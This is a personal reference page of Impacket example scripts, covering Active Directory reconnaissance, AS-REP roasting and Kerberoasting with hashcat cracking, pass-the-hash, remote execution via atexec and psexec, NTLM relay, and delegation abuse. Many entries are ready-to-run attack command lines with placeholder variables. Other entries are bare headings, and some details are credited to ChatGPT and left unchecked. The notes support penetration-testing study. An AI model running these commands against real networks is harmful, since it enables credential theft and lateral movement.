Less Secure

Impacket

Link: https://github.com/fortra/impacket/tree/master/examples

TODO:

Foreword

This is a reference of all of the Impacket scripts and their usage as of commit 678cd0a (March 11th, 2025).

Assumptions

All commands are assumed to point to the correct place, e.g. atexec really is atexec.py or impacket-atexec. This is just for brevity and to account for personal setups.

If the domain controller NETBIOS name is not resolvable, then you will need to use -dc-ip when running most of these scripts. For brevity, I elected not to include this.

For some commands it may be a good idea to add this alias so you get timestamps on log output:

alias impacketCommand='impacketComment -ts'

Finally, I will be using these variables in the examples:

# Basic attributes
DOMAIN=""
USERNAME=""
TARGET_HOST=""
COMMAND=""

# Used if TARGET_HOST is the NETBIOS name and it cannot be resolved
TARGET_IP=""

# Password authentication
PASSWORD=""

# Pass the hash
LM_HASH=""
NTLM_HASH=""

# Kerberos authentication
KRB5CCNAME=""
KEYTAB_FILE=""

# Pass the key
AES_HEX=""
AES_KEY=""

DumpNTLMInfo.py (Reconnaisance | Windows / AD)

Description (Impacket)

TIP

Combine this with getArch.py.

Dump a variety of remote host information via SMB or RPC.

Here are the attributes that will be dumped:

  • SMBv1 Enabled
  • Preferred SMB Dialect
  • Server Security (SMB Signing)
  • Max Read Size
  • Max Write Size
  • Boot Time
  • Server Up Time
  • Hostname
  • Domain Name
  • DNS Tree Name
  • DNS Domain Name
  • OS
  • Null Session

Examples

# Basic usage
DumpNTLMInfo "${TARGET_HOST}"

# In case the NetBIOS name is not resolvable from your current machine
DumpNTLMInfo -target-ip "${TARGET_HOST_IP}" "${TARGET_HOST}"

# Use RPC instead of SMB to collect host information
DumpNTLMInfo -protocol rpc "${TARGET_HOST}"

References

Get-GPPPassword.py (Group Policy Password)

GetADComputers.py (Reconnaisance | AD)

GetADUsers.py (Reconnaisance | AD)

GetLAPSPassword.py (Privilege Escalation)

Description

ChatGPT: TL;DR: LAPS is used for unique, random local admin account passwords stored in AD. Can only be retrieved by authorized users/groups. Look for the ms-Mcs-AdmPwd attribute. For legacy LAPS, this is msLAPS-Password. May also see msLAPS-EncryptedPassword, which requires the LAPS decryption key (elevate privileges, check ACEs, ...).

GetNPUsers.py (ASREProast)

Description

If a domain user has the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH), then it is possible to get a Kerberos TGT (Ticket to Get Tickets) for said user without authenticating to the Key Distribution Center (KDC) beforehand.

This TGT is used request sessions (specifically service tickets) with various services on the network. In order for this mechanism to work, the TGT contains a session key that is encrypted with the user's password hash. Naturally, we can crack this session key to retrieve the user's password.

All of that to say, if a certain box is checked in AD, we can get crackable key material without needing to compromise the account, a process, a service, etc. beforehand.

This attack is known as ASREProast.

Examples

This script requires compromised credentials for any user.

# Get a TGT for a user
GetNPUsers -no-pass "${DOMAIN}/${USERNAME}"

# Get a list of users with `UF_DONT_REQUIRE_PREAUTH` set
GetNPUsers "${DOMAIN}/${USERNAME}:${PASSWORD}"

# Request TGTs for all users
GetNPUsers -request "${DOMAIN}/${USERNAME}:${PASSWORD}"

# Save the TGTs to a file (hashcat is the default format)
GetNPUsers -request -outputfile "${DOMAIN}.asreproast" "${DOMAIN}/${USERNAME}:${PASSWORD}"
GetNPUsers -request -format john -outputfile "${DOMAIN}.asreproast" "${DOMAIN}/${USERNAME}:${PASSWORD}"

# Pass the hash
GetNPUsers -hashes "${LM_HASH}:${NTLM_HASH}" -request -outputfile "${DOMAIN}.asreproast" "${DOMAIN}/${USERNAME}"

# Use Kerberos
GetNPUsers -no-pass -k -request -outputfile "${DOMAIN}.asreproast" "${DOMAIN}/${USERNAME}"
GetNPUsers -no-pass -keytab "${KEYTAB_FILE}" -request -outputfile "${DOMAIN}.asreproast" "${DOMAIN}/${USERNAME}"

# Pass the key
GetNPUsers -no-pass -aesKey "${AES_HEX}" "${AES_KEY}" -request -outputfile "${DOMAIN}.asreproast" "${DOMAIN}/${USERNAME}"

Once you have the TGTs in a file, you can attempt to crack them using hashcat (or John the Ripper, but I don't know the command for it):

hashcat -O -D 2 -m 18200 "${DOMAIN}.asreproast" /path/to/wordlist

References

GetUserSPNs.py (Kerberoast)

Description

If a domain user has the servicePrincipalName (SPN) attribute set, then it is possible to request a Kerberos service ticket (TGS-REP) for said user.

This service ticket is encrypted using the password hash of the service account, so we can crack the service ticket to get the associated service account's password.

This is possible because a user can request a ticket for any service. When an account authenticates to a service with Kerberos, the service itself has to validate service tickets when presented with one - it is not the responsibility of the KDC to do so. So while this could be used to authenticate to the service with a pre-compromised account, it probably won't be very useful with what is likely a low-level account. However, if we take the ticket to a machine we control, we can extract the information we need for cracking and compromise the service account associated with the service (assuming the password is crackable).

Examples

This script requires compromised credentials for any user.

# Request TGS-REP for all users
GetUserSPNs -request "${DOMAIN}/${USERNAME}:${PASSWORD}"

# Request TGS-REP for a specific user
GetUserSPNs -request-user "${TARGET_USERNAME}" "${DOMAIN}/${USERNAME}:${PASSWORD}"

# Save the TGS-REPs to a file
GetUserSPNs -request -outputfile "${DOMAIN}.kerberoast" "${DOMAIN}/${USERNAME}:${PASSWORD}"

# Save the TGS-REPs to a ccache file for pass the cache attacks
GetUserSPNs -request -save "${DOMAIN}-kerberoasted.ccache" "${DOMAIN}/${USERNAME}:${PASSWORD}"

# Pass the hash
GetUserSPNs -hashes "${LM_HASH}:${NTLM_HASH}" -request -outputfile "${DOMAIN}.kerberoast" "${DOMAIN}/${USERNAME}"

# Use Kerberos
GetUserSPNs -no-pass -k -request -outputfile "${DOMAIN}.kerberoast" "${DOMAIN}/${USERNAME}"
# Keytab doesn't seem to be supported for this script?
# GetUserSPNs -no-pass -keytab "${KEYTAB_FILE}" -request -outputfile "${DOMAIN}.kerberoast" "${DOMAIN}/${USERNAME}"

# Pass the key
GetUserSPNs -no-pass -aesKey "${AES_HEX}" "${AES_KEY}" -request -outputfile "${DOMAIN}.kerberoast" "${DOMAIN}/${USERNAME}"

Once you have the tickets in a file, you can attempt to crack them using hashcat (or John the Ripper, but I don't know the command for it):

hashcat -O -D 2 -m 13100 "${DOMAIN}.kerberoast" /path/to/wordlist
hashcat -O -D 2 -m 19700 "${DOMAIN}.kerberoast" /path/to/wordlist

References

addcomputer.py (Privilege Escalation)

Description

If ms-DS-MachineAccountQuota is too high, a new computer can be added to the domain and potentially be added to privileged groups.

Can use SAMR to make it look like it happened via Windows GUI.

References

atexec.py (Lateral Movement)

Description

The ATSvc RPC interface provides methods to control scheduled tasks.

If we have credentials for a remote host, we can abuse this interface to to create and run an scheduled task on a remote target via SMB, thereby enabling remote command execution.

Note that this only works on version of Windows higher than Vista.

How does this work?

A randomly-named scheduled task is created on the remote host. The action is the provided command wrapped in cmd.exe with output redirected to a temporary file.

For example, the command may look something like this:

"cmd.exe" /C whoami > C:\Windows\Temp\BwBxpEDt.tmp 2>&1

Note that the command will be executed as SYSTEM unless -silentcommand or -session-id is provided. However, there's a catch with these options. Both will fail to provide any output due to the lack of output redirection. The latter will additionally execute the command in the user context of the provided session ID.

After the scheduled task is created, it is executed and deleted. The temporary file with the command output will then be retrieved via the ADMIN$ share (C:\Windows folder) before being deleted.

Examples

This script requires compromised credentials for a privileged user.

# Prepend timestamps if desired
alias atexec='atexec -ts'

# Password authentication
atexec "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" "${COMMAND}"

# Pass the hash
atexec -hashes "${LM_HASH}:${NTLM_HASH}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}" "${COMMAND}"

# Kerberos authentication
atexec --no-pass -k "${DOMAIN}/${USERNAME}@${TARGET_HOST}" "${COMMAND}"
atexec --no-pass -keytab "${KEYTAB_FILE}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}" "${COMMAND}"

# Pass the key
atexec --no-pass -aesKey "${AES_HEX}" "${AES_KEY}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}" "${COMMAND}"

References

changepasswd.py

dacledit.py

References

dcomexec.py (Lateral Movement)

Description

dcomexec.py works by utilizing one of three DCOM endpoints across a network to execute commands: ShellWindows, ShellBrowserWindow, or MMC20

Out of the three options, the MMC20 COM object is the most interesting because it is related to mmc.exe or Microsoft Management Console.

Actually, what is most interesting is that MMC20 COM object has a method called ExecuteShellCommand, which as the name suggests, allows us to execute commands.

Because each command is executed as a child process of mmc.exe, the result is a semi-interactive shell - similar to what we saw using smbexec.py.

Something really cool about dcomexec.py is that the commands are being executed as the actual Administrator user, and not under the context of SYSTEM.

References

describeTicket.py

dpapi.py

esentutl.py

exchanger.py

findDelegation.py

getArch.py (Reconnaisance | Windows)

Description

TIP

Combine this with DumpNTLMInfo.py.

Get the architecture of a Windows host remotely, without credentials.

How does it work?

This script will attempt to connect to the machine's RPC endpoint using the transfer syntax 64-bit Network Data Representation (NDR64)open in new window. If it fails, the machine must be 32-bit.

# Use RPC over TCP/IP
# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/95fbfb56-d67a-47df-900c-e263d6031f22
stringBinding = f"ncacn_ip_tcp:{machine}[135]"
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(int(self.options.timeout))
dce = transport.get_dce_rpc()
dce.connect()
try:
    dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=self.NDR64Syntax)
except DCERPCException as e:
    if str(e).find("syntaxes_not_supported") >= 0:
        print(f"{machine} is 32-bit")
    else:
        logging.exception(str(e))
else:
    print(f"{machine} is 64-bit")

Examples

This one is pretty straightforward.

# Single host
getArch -target "${TARGET_HOST}"

# Multiple hosts
getArch -targets ./hosts.txt

# Increase the timeout if needed (default is 2 seconds)
getArch -target "${TARGET_HOST}" -timeout 10

References

getPac.py (Utility | Kerberos)

Description

PAC -> Privilege Attribute Certificate

This script will get the PAC of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]'s S4USelf + User to User Kerberos Authentication.

Original idea (or accidental discovery 😃 ) of adding U2U capabilities inside a S4USelf by Benjamin Delpy (@gentilkiwi)

The PAC contains security attributes for the user and serve as a mechanism for authorization.

What is a PAC (Privilege Attribute Certificate)? A Privilege Attribute Certificate (PAC) is a Kerberos authorization data structure used in Windows Active Directory (AD) to store privilege-related information about a user during Kerberos authentication.

How is a PAC Used in Kerberos Authentication? When a user authenticates via Kerberos, the Domain Controller (DC) issues a Ticket-Granting Ticket (TGT) that includes the PAC. This PAC contains:

User's Security Identifiers (SIDs) (including group memberships).

Privileges and authorization data (e.g., if the user is a Domain Admin).

Logon session information (e.g., login time, profile path).

Integrity Check (signed by the DC to prevent tampering).

The PAC is embedded inside Kerberos tickets and is later used to enforce access control when requesting access to services.

Attackers can manipulate or forge PAC data to escalate privileges and move laterally in a network.

NOTE: PAC is signed by the DC, or at least there's a specific field that is. This is why krbtgt is important to guard (golden tickets -> any TGT).

References

getST.py (Service Ticket) (Privilege Escalation / Lateral Movement | Constrained Delegation Abuse)

Description

Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the -impersonate flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account and request a Service Ticket on its behalf for the www service on host server01.test.local.

From Red XOR Blue:

# Constrained delegation
getST.py -spn SERVICE/HOSTNAME_YOU_HAVE_DELEGATION_RIGHTS_TO.FQDN -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD
# Resource-based constrained delegation
getST.py -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT  DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD

NOTE: Service name can be changed...? Allows for accessing other services by chaining w/ other Impacket tools, e.g. secretsdump.py. See Red XOR Blue article.

References

getTGT.py

goldenPac.py

karmaSMB.py

keylistattack.py

kintercept.py

lookupsid.py

machine_role.py

mimikatz.py

mqtt_check.py

mssqlclient.py

mssqlinstance.py

net.py (Utility | AD)

Description

Impacket replacement for the canonical net.exe, which can be used to query and/or manipulate domain and/or local objects.

Specifically, this is a SAMR RPC client.

Examples

TODO

Object manipulation is possible. I still need to write out some potential scenarios.

# Enumerate all domain/local users
net "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" user
net -hashes "${LM_HASH}:${NTLM_HASH}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}" user
net --no-pass -k "${DOMAIN}/${USERNAME}@${TARGET_HOST}" user
net --no-pass -keytab "${KEYTAB_FILE}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}" user
net --no-pass -aesKey "${AES_HEX}" "${AES_KEY}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}"user

# Enumerate all computers in the domain
net "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" computer

# Enumerate local groups of a local computer
net "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" localgroup

# Enumerate all groups in the domain
net "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" group

netview.py

ntfs-read.py

ntlmrelayx.py

Description

Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).

The below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and execute whoami /all. In order for the SMB server to recieve credentials to relay, dementor.py can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.

python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -c 'whoami /all' -debug

References

owneredit.py

ping.py (Utility | Network)

Description

Ping an IPv4 address. Easy. This is just a reimplementation in pure Python.

Of course, beware that a lack of reply doesn't necessarily mean that the host is offline - there may be a firewall in the way.

Examples

Note that this requires sudo.

sudo ping.py "${SRC_IP}" "${DST_IP}"

ping6.py (Utility | Network)

Description

Ping an IPv6 address. Easy. This is just a reimplementation in pure Python.

Of course, beware that a lack of reply doesn't necessarily mean that the host is offline - there may be a firewall in the way.

Examples

Note that this requires sudo.

sudo ping6.py "${SRC_IP}" "${DST_IP}"

psexec.py (Lateral Movement)

Description

PsExec (part of the Sysinternals suite) is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.

This is a Python version of this utility which provides more authentication methods, e.g. pass the hash.

WARNING: This technique has been abused to the point that you can very easily set off defensive tools. Tread with caution.

How does this work?

Note that the credentials supplied to PsExec for authentication must have elevated privileges on the target machine.

The tool will create a randomly-named service executable and upload it to the ADMIN$ share (C:\Windows folder) on the target host via SMB. From there, the Windows Service Control Manager (SCM) will be used to create a randomly-named service (PsExecsvcservice in the original non-malicious version), which will load and execute the binary. A named pipe is used for input/output redirection.

(What is SCM? It's a remote procedure call (RPC) server, so that service configuration and service control programs can manipulate services on remote machines.)

TODO: How Impacket does it differently

Examples

This script requires compromised credentials for a privileged user.

Common usage:

# Basic usage
# Note that the default command is cmd.exe, which is reflected in the variable usage
psexec "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" "${COMMAND:-cmd.exe}"

# Pass the hash
psexec -hashes "${LM_HASH}:${NTLM_HASH}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}" "${COMMAND:-cmd.exe}"

# Kerberos authentication
psexec --no-pass -k "${DOMAIN}/${USERNAME}@${TARGET_HOST}" "${COMMAND}"
psexec --no-pass -keytab "${KEYTAB_FILE}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}" "${COMMAND:-cmd.exe}"

# Pass the key
psexec --no-pass -aesKey "${AES_HEX}" "${AES_KEY}" "${DOMAIN}/${USERNAME}@${TARGET_HOST}" "${COMMAND:-cmd.exe}"

psexec.py also has the following useful options:

# In case the NETBIOS name is provided as the target, but cannot be resolved
psexec -target-ip "${TARGET_IP}" "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" "${COMMAND:-cmd.exe}"

# In case the port is funky
psexec -port "${SMB_PORT}" "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" "${COMMAND:-cmd.exe}"

# In case you want a specific service name (the default is a random string)
psexec -service-name "${SERVICE_NAME}" "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" "${COMMAND:-cmd.exe}"

# In case you want a specific remote binary name (the default is a random string)
psexec -remote-binary-name "${REMOTE_BINARY_NAME}" "${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}" "${COMMAND:-cmd.exe}"

References

raiseChild.py

rbcd.py (Privilege Escalation / Lateral Movement | Delegation Abuse)

Description

Impacket rbcd.py will modify the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer with security descriptor of another computer. The following command adds the related security descriptor of the created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of DC01. This basically means that EVILCOMPUTER can get impersonated service tickets for DC01 using getST.py.

References

rdp_check.py

reg.py (Reconnaisance (+ More))

Description

Query and manipulate the registry on a remote system.

Note that this is more useful if you have administrative credentials - standard users are limited to a certain set of keys at the RPC level (though this doesn't mean that it will never be possible!). Specifically, they cannot view HKLM (local machine). However, HKU (users) and HKCU (current user) should be accessible.

Examples (Query)

::: note

I will be skipping hash and Kerberos auth in favor of actual enumeration commands. Usage in those scenarios is the same as other Impacket scripts.

Additionally, because the invocation can be quite long, I will be using these for brevity:

# However you need to do this
CONN="${DOMAIN}/${USERNAME}:${PASSWORD}@${TARGET_HOST}"
CONN="${DOMAIN}/${USERNAME}@${TARGET_HOST} -hashes ${LM_HASH}:${NTLM_HASH}"
CONN="${DOMAIN}/${USERNAME}@${TARGET_HOST} -k"
CONN="${DOMAIN}/${USERNAME}@${TARGET_HOST} -keytab ${KEYTAB_FILE}"

# For brevity
alias query_reg_key="reg ${CONN} query -keyName"

:::

Before any specific scenarios, here are some basic invocations and options:

# Query a registry key
reg "${CONN}" query -keyName "${REG_KEY}"

# Query all subkeys and value names recursively
reg "${CONN}" query -keyName "${REG_KEY}" -s

# Query a specific value name (default: all values)
reg "${CONN}" query -keyName "${REG_KEY}" -v "${REG_VALUE}"

# Queries for the default value or empty value name
reg "${CONN}" query -keyName "${REG_KEY}" -ve

As a standard user:

# HKLM
query_reg_key "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Updates" -s

# HKU
query_reg_key "HKU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"

# HKCU
query_reg_key "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"

As an admin:

# Installed KBs
query_reg_key "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Updates" -s

# Installed applications
query_reg_key "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"
query_reg_key "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall"

# Scheduled tasks
query_reg_key "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Taskcache\\Tasks" -s

# Custom/non-standard scheduled tasks
query_reg_key "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Taskcache\\Tasks" -s `
  | grep "Path" `
  | grep -iv 'Microsoft\\Windows'

# Services
#
# TODO: Find or create a tool that can filter out common services
# https://www.tenforums.com/tutorials/57567-restore-default-services-windows-10-a.html
#
query_reg_key "HKLM\\SYSTEM\\CurrentControlSet\\Services"

# Specific service info
query_reg_key "HKLM\\SYSTEM\\CurrentControlSet\\Services\\backdoor"

# Check if LAPS is installed
query_reg_key "HKLM\\Software\\Policies\\Microsoft Services\\AdmPwd"

# Check if WDigest is enabled
#
# Moving on, we can also check the WDigest key to see if that service is enabled.
# Specifically, we want to check if "?"UseLogonCredential" is set to 1, which means cleartext creds are stored in memory.
# This is good information to have for post-compromise attacks.
#
query_reg_key "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest"

# Check the WinLogin key for stored autologon credentials
query_reg_key "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon"

References

registry-read.py

rpcdump.py

rpcmap.py

sambaPipe.py

samrdump.py (Reconnaisance)

Description

Use the Security Account Manager Remote (SAMR) Protocol to dump local users + associated information on a remote machine.

TODO: Is the password policy accessible here? Not sure if ChatGPT hallucinated something - it claims this script dumps password policy, but it doesn't seem to. Though there may be a grain of truth because under MS-SAMR: 3.1.1.7.1 General Password Policyopen in new window

References

secretsdump.py

services.py

Description

Manipulate Windows services remotely.

References

smbclient.py

smbexec.py

smbserver.py

sniff.py

sniffer.py

split.py

ticketConverter.py

ticketer.py

tstool.py

wmiexec.py (Lateral Movement)

Description

wmiexec.py uses the DCOM interface to connect to a remote target's Windows Management Instrumentation (WMI) interface, and execute commands.

This method is very similar to dcomexec.py, except the commands are ran as a child process of wmiprvse.exe, rather than mmc.exe.

Both scripts also utilize DCOM for their delivery, just in different ways.

Wmiexec.py uses the DCOM interface as a connection method to WMI, whereas dcomexec.py uses actual DCOM objects to execute the commands.

Due to each command being executed as a child process of wmiprvse.exe, the result is a semi-interactive shell - similar to what we saw using dcomexec.py and smbexec.py.

References

wmipersist.py

wmiquery.py

Last Updated: